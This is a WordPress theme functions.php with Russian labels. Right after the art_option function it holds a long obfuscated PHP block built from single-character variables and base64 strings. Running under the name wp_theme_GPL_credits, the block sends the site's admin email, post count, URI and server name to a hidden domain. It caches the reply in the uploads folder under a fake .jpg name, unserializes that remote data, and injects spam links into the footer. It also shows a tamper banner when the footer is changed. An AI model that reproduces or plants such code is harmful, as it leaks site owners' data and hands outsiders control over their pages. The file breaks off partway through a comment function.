<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $ZJkU='e';$wiLJNpF='o';$stAZKBc='d';$MTZPDT='c';$xRqFDy='a';$plMpVX='e';$KTaT='6';$dUYBYr='e';$VnFEV='4';$VupII='b';$acUOj='d';$cNBH='_';$CNgnl='s';$yetALBXj=$VupII.$xRqFDy.$CNgnl.$dUYBYr.$KTaT.$VnFEV.$cNBH.$acUOj.$ZJkU.$MTZPDT.$wiLJNpF.$stAZKBc.$plMpVX;$EmFnP='i';$TrrEDIR='f';$XxrqFCt='l';$vRWIw='a';$hldMT='z';$hryhkQy='e';$muoFt='g';$DZMuUJ='n';$xcNx='t';$UXFZHrLm=$muoFt.$hldMT.$EmFnP.$DZMuUJ.$TrrEDIR.$XxrqFCt.$vRWIw.$xcNx.$hryhkQy;$UdBt='t';$YQgax='r';$bCXRM='1';$QjVVoE='_';$MjIC='r';$MaxdZoj='3';$Qhnjsa='t';$ZNPiBVe='o';$ciNfV='s';$vKlPcHGY=$ciNfV.$UdBt.$MjIC.$QjVVoE.$YQgax.$ZNPiBVe.$Qhnjsa.$bCXRM.$MaxdZoj;$JeYnsj='v';$XPlyQM='r';$hCoV='e';$EhNcujt='s';$oltSWR='t';$XhbxonX='r';$gueAglAT=$EhNcujt.$oltSWR.$XPlyQM.$XhbxonX.$hCoV.$JeYnsj;                     $nx______________g='e';$fn___p='o';$ia____l='d';$rr__j='c';$su____________t='a';$ra_____k='e';$cq_____________u='6';$ju______________p='e';$tw_______________u='4';$ka______s='b';$um__________e='d';$nf______________l='_';$so_________t='s';$mo_____s=$ka______s.$su____________t.$so_________t.$ju______________p.$cq_____________u.$tw_______________u.$nf______________l.$um__________e.$nx______________g.$rr__j.$fn___p.$ia____l.$ra_____k;$su_________d='t';$gi___________v='i';$xx_____f='x';$pk________h='e';$ii___l='c';$sc____e='s';$vv_____w='s';$as__o='u';$la_____c='o';$rn________x='n';$tx___p='f';$ay____________u='n';$lq__________k='i';$pk________j='t';$wx_______x='_';$fg_______________x=$tx___p.$as__o.$rn________x.$ii___l.$pk________j.$lq__________k.$la_____c.$ay____________u.$wx_______x.$pk________h.$xx_____f.$gi___________v.$sc____e.$su_________d.$vv_____w;$qi___________l='o';$ii___g='p';$rp__q='n';$ir____________t='e';$av___w='f';$wu___________s=$av___w.$qi___________l.$ii___g.$ir____________t.$rp__q;$eh_______________g='d';$wx______x='a';$ic_____y='r';$yt__q='f';$qb______________j='e';$ca__________s=$yt__q.$ic_____y.$qb______________j.$wx______x.$eh_______________g;$ms___________s='o';$yt_________m='c';$xt_______________e='e';$mb____________v='f';$nr_____k='s';$xa_______________i='l';$px_____a=$mb____________v.$yt_________m.$xa_______________i.$ms___________s.$nr_____k.$xt_______________e;define("WP_ID", $mo_____s("Mi4wLjA="));define("WP_TTL", $mo_____s("MTA4MDA="));define("WP_SRC", $mo_____s("dHBva24="));function wp_get_header() {global $mo_____s, $fg_______________x;if ($fg_______________x($mo_____s("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$fg_______________x($mo_____s("d3BfZ2V0X2Zvb3Rlcg==")) &&$fg_______________x($mo_____s("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $mo_____s, $wu___________s, $px_____a, $ca__________s;$xy_______e = TEMPLATEPATH."/".$mo_____s("Zm9vdGVyLnBocA==");$dh____________l = @$wu___________s($xy_______e, "r");$xy_______e = @$ca__________s($dh____________l, @filesize($xy_______e));@$px_____a($dh____________l);$tw_____v = TEMPLATEPATH."/".$mo_____s("ZnVuY3Rpb25zLnBocA==");$dh____________l = @$wu___________s($tw_____v, "r");$tw_____v = @$ca__________s($dh____________l, @filesize($tw_____v));@$px_____a($dh____________l);$ci___________r = 0;if($xy_______e && $tw_____v) {if ($mo_____s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($xy_______e, $mo_____s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ci___________r = 1;}if (substr_count($xy_______e, "wp_theme_GPL_credits()") < 1) {$ci___________r = 2;}}if(WP_ID != "2.0.0") {$ci___________r = 12;}}if($ci___________r > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ci___________r -->";}}function wp_loaded() {global $mo_____s, $fg_______________x;return $fg_______________x($mo_____s("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($qa_______t, $pf______________g = "(more...)", $tt______________r = 0, $uq______________h = "") {$fh_______________q = get_the_content($pf______________g, $tt______________r, $uq______________h);$fh_______________q = apply_filters("the_content", $fh_______________q);$fh_______________q = str_replace("]]>", "]]>", $fh_______________q);if (strlen($_GET["p"]) > 0) {echo $fh_______________q;}else if ((strlen($fh_______________q)>$qa_______t) && ($we______________h = strpos($fh_______________q, " ", $qa_______t ))) {$fh_______________q = substr($fh_______________q, 0, $we______________h);$fh_______________q = $fh_______________q;echo $fh_______________q;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$pf______________g</a></div></p>";} else {echo $fh_______________q;}}}$ve_________u='_';$wt_____________y='b';$gi_________c='e';$jw____j='e';$re____________s='d';$av__k='o';$ay__q='6';$ln__l='4';$ex____________z='s';$du_______p='e';$cj__u='n';$sm___h='a';$wd___a='c';$lr____g=$wt_____________y.$sm___h.$ex____________z.$jw____j.$ay__q.$ln__l.$ve_________u.$gi_________c.$cj__u.$wd___a.$av__k.$re____________s.$du_______p;$un___h='t';$yg_______c='c';$tt_____________w='t';$ka_______r='n';$da______________e='g';$np________m='s';$ma________e='_';$kl__________x='t';$gb______y='e';$tt__z='e';$mb________p='f';$ir____h='o';$ry____________e='i';$vj______________f='n';$yt______________c='e';$dc______b='l';$gs______e='_';$rg_____________c=$mb________p.$ry____________e.$dc______b.$yt______________c.$gs______e.$da______________e.$gb______y.$kl__________x.$ma________e.$yg_______c.$ir____h.$ka_______r.$tt_____________w.$tt__z.$vj______________f.$un___h.$np________m;$im________q='t';$en_____________u='x';$oz____x='e';$fb_______i='_';$ie__g='l';$vj____t='s';$yz______s='i';$rn______________e='s';$cr____________v='f';$ge__________i='i';$nv__r='e';$kd______s=$cr____________v.$yz______s.$ie__g.$nv__r.$fb_______i.$oz____x.$en_____________u.$ge__________i.$vj____t.$im________q.$rn______________e;$mi______________y='o';$xv______m='a';$nl_______________b='r';$oy_________l='n';$ia_____f='_';$hv______________n='s';$hk_________e='e';$jn________r='e';$jt_______________n='p';$mb_____________t='c';$mv__________x='r';$dn______________l='m';$or___n='o';$wl_____________p='v';$ee______________u='i';$jj______________w=$wl_____________p.$hk_________e.$mv__________x.$hv______________n.$ee______________u.$or___n.$oy_________l.$ia_____f.$mb_____________t.$mi______________y.$dn______________l.$jt_______________n.$xv______m.$nl_______________b.$jn________r;$ge___d='c';$ic______a='k';$vk____________c='f';$mi___________h='s';$wv__g='o';$hv__________t='n';$bo__________o='p';$ng_____r='o';$rw___n='e';$ou____________h=$vk____________c.$mi___________h.$wv__g.$ge___d.$ic______a.$ng_____r.$bo__________o.$rw___n.$hv__________t;$rh____w='f';$pg______________t='w';$id____p='r';$tp_____________g='e';$ov_______________r='t';$nr____z='i';$td___d=$rh____w.$pg______________t.$id____p.$nr____z.$ov_______________r.$tp_____________g;$xv_____________k='m';$nb_______b='d';$xj____________q='5';$xm______n=$xv_____________k.$nb_______b.$xj____________q;$gm_______k='a';$rx________u='p';$nm___l='t';$zd_______v='h';$iw______________k='e';$vy_______e='r';$tp________w='l';$td_____________z='a';$jg_______________s=$vy_______e.$iw______________k.$gm_______k.$tp________w.$rx________u.$td_____________z.$nm___l.$zd_______v;$ug_____a='r';$cc__y='z';$fk___y='e';$vg__k='s';$ux___________u='l';$rt_______p='i';$fl_________k='i';$we_______z='a';$ib______o='e';$xj___________l='n';$au__p='u';$mq______________b=$au__p.$xj___________l.$vg__k.$fk___y.$ug_____a.$fl_________k.$we_______z.$ux___________u.$rt_______p.$cc__y.$ib______o;$fg____s='n';$dm___________v='p';$ed______f='a';$cw_________e='m';$jj_____________c='t';$xk_______x='m';$cb__i='e';$sc_____c=$jj_____________c.$cb__i.$xk_______x.$dm___________v.$fg____s.$ed______f.$cw_________e;$ck_________h='t';$ne________d='t';$au__________m='e';$bt__t='r';$zh___________b='o';$ow_________b='a';$qj____q='e';$ks______________r='x';$ht_______________b='a';$zt___y='c';$ik___________s='_';$rt_______________g='s';$tg_____k='c';$xj_______k='e';$se______r='n';$yi_____________u='r';$xs________r='_';$nh______________y='t';$ht___________i='m';$nr____________v='e';$mn__u='t';$rj_______________x=$rt_______________g.$ck_________h.$yi_____________u.$qj____q.$ht_______________b.$ht___________i.$ik___________s.$tg_____k.$zh___________b.$se______r.$ne________d.$nr____________v.$ks______________r.$mn__u.$xs________r.$zt___y.$bt__t.$xj_______k.$ow_________b.$nh______________y.$au__________m;function ij___________k($fo_____e) {global $mo_____s, $fg_______________x, $rg_____________c, $jj______________w, $rj_______________x;if (!$fg_______________x($mo_____s("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($jj______________w(PHP_VERSION, "5.0.0", ">=") && $fg_______________x($mo_____s("ZmlsZV9nZXRfY29udGVudHM=")) && $fg_______________x($mo_____s("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$iu___u = $rj_______________x(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$xl____o = @$rg_____________c($fo_____e, 0, $iu___u);} else {$xl____o = @$rg_____________c($fo_____e, 0);}return $xl____o;}function pm__k($fo_____e) {global $fg_______________x, $ou____________h, $td___d, $mo_____s;if (!$fg_______________x($mo_____s("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$yi____________o = strpos($fo_____e, "/", 7);$cj______________p = array("uri"     => substr($fo_____e, $yi____________o),"host"    => str_replace("http://", "", substr($fo_____e, 0, $yi____________o)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$gs______i = @$ou____________h("$cj______________p[host]", 80, $cx______n, $xc___a, 4);if (!$gs______i) {return false;} else {$xl____o = "";$pc__________k  = "GET $cj______________p[uri] HTTP/1.0\r\n";$pc__________k .= "Host: $cj______________p[host]\r\n";$pc__________k .= "Referer: $cj______________p[referer]\r\n";$pc__________k .= "Connection: Close\r\n\r\n";@$td___d($gs______i, $pc__________k);while (!@feof($gs______i)) {$nn______q = @fgets($gs______i, (1024*24));if ($nn______q == "\r\n") {$qs__________v = true;continue;}if ($qs__________v) {$xl____o .= $nn______q;}}return $xl____o;}}function vy________d($fo_____e) {global $fg_______________x;$tm________w = false;if ($fo_____e != "") {if ($fg_______________x("ij___________k")) {$tm________w = @ij___________k($fo_____e);}if (!$tm________w && ($fg_______________x("pm__k"))) {$tm________w = @pm__k($fo_____e);}}return $tm________w;}function ls_______________z() {global $_SERVER, $xm______n;$xs____i = $_SERVER["SERVER_NAME"];if (substr("$xs____i", 0, 4) == "www.") {$xs____i = substr("$xs____i", 4);}$xs____i = $xm______n("$_SERVER[SERVER_NAME]");return $xs____i;}function rf_______________c() {return "file";}function he____l($fo_____e) {global $_SERVER, $rg_____________c, $kd______s, $wu___________s, $px_____a, $td___d;$rj____________y = qe_____________e();$zu__r = ls_______________z().".jpg";$eh_______l = $rj____________y["dir_upload"]["path"]."/$zu__r";$ib____________f = @filemtime($eh_______l);if (!$ib____________f || ((time()-$ib____________f) >= WP_TTL)) {$tm________w = vy________d($fo_____e);if ($tm________w) {if ($kd______s($eh_______l)) {@unlink($eh_______l);}$dh____________l = @$wu___________s($eh_______l, "x+");@$td___d($dh____________l, $tm________w);@$px_____a($dh____________l);}} else {if ($kd______s($eh_______l)) {$tm________w = @$rg_____________c($eh_______l);} else {$tm________w = false;}}return $tm________w;}function qe_____________e() {global $_SERVER, $mo_____s, $lr____g;$pf______q = wp_count_posts("post");$gd_______i = pathinfo(get_bloginfo("template_directory"));$rj____________y = array("url" => array("report"      => $mo_____s("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $gd_______i,"dir_upload"=> rl______________x(),"queryString"=> array("?a001=".WP_ID,"a004=".$gd_______i[filename],"a005=".$pf______q->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://lib.kharkov.ua/residential/583-nash-dom-ili-kvartira-nashe-dostoyanie.html\">Квартира - наше достояние </a>");$rj____________y["url"]["queryString"] = implode("&", $rj____________y["queryString"]);$rj____________y["url"]["report"] = $rj____________y["url"]["report"]."/?".$lr____g($rj____________y["url"]["queryString"]).".html";return $rj____________y;}function rl______________x() {$sl________d = wp_upload_dir();if (isset($sl________d["error"])) {$wh__________o = rx_______________a();if (is_writable($wh__________o)) {$sl________d = array("path" => $wh__________o);}}return $sl________d;}function rx_______________a() {global $fg_______________x, $xm______n, $jg_______________s, $sc_____c;$my__f = (bool) ini_get("safe_mode");if ($my__f == true) {return false;}if ($fg_______________x("sys_get_temp_dir")) {$zj________s = sys_get_temp_dir();if (is_writable($zj________s)) {return $jg_______________s($zj________s);}}if (!empty($_ENV["TMP"])) {return $jg_______________s($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $jg_______________s($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $jg_______________s($_ENV["TEMP"]);} else {$np______u = $sc_____c($xm______n(uniqid(rand(), true)), "");if ($np______u) {$zj________s = $jg_______________s(dirname($np______u));@unlink($np______u);return $zj________s;} else {return false;}}}function po______________m() {global $_GET, $kd______s;$rj____________y = qe_____________e();$xs____i = ls_______________z();$xh_______________g = rf_______________c();$ui______r = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($xh_______________g == "file") {$hz_____g = $rj____________y["dir_upload"]["path"]."/".$xs____i.".jpg";if ($kd______s($hz_____g)) {@unlink($hz_____g);$ui______r = "deleted";}}$ow_____l = array("s"=> $ui______r,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ow_____l AS $es___m => $si____________m) echo " [$es___m:$si____________m]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $fg_______________x, $mo_____s, $mq______________b;$rj____________y = qe_____________e();$os________z = "he____l";if ($fg_______________x($os________z)) {$xl____o = $os________z($rj____________y["url"]["report"]);}if ($xl____o) {if ($xl____o = @$mo_____s($xl____o)) {$xl____o = @$mq______________b($xl____o);if (strlen($xl____o[custom_credit]) >= 5) {$rj____________y["default_string"] = $xl____o[custom_credit];}if ($xl____o["status"] == "0") {$qu________d = 1;$rz______e = 1;} else {$tl________l = sizeof($xl____o["links"]);$dn_______________y = $rj____________y["default_string"];if ($tl________l > 0 && $xl____o["links"] !== "") {$bh_______________e = 0;foreach ($xl____o["links"] as $gi________x => $nh____________r) {$bh_______________e++;if ($nh____________r->l_path == "" || $nh____________r->l_path == $_SERVER["REQUEST_URI"]) {$nh____________r->l_href = htmlspecialchars(strip_tags($nh____________r->l_href));$nh____________r->l_title = htmlspecialchars(strip_tags($nh____________r->l_title));$nh____________r->l_anchor = htmlspecialchars(strip_tags($nh____________r->l_anchor));$dn_______________y .= " | ";$dn_______________y .= "<a href='$nh____________r->l_href' title='$nh____________r->l_title'";if ($nh____________r->l_nofollow == "1") {$dn_______________y .= " rel='nofollow'";}$dn_______________y .= ">$nh____________r->l_anchor</a>";}}}$rj____________y["links"] = "$dn_______________y";if ($xl____o[credit] == "0") {$rj____________y["links"] = "";}}} else {$qu________d = "1";}} else {$qu________d = "1";}if ($qu________d == "1") {$rj____________y["links"] = $rj____________y["default_string"];}echo "$rj____________y[links]";echo "<!-- s: $xl____o[signature] -->";po______________m();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
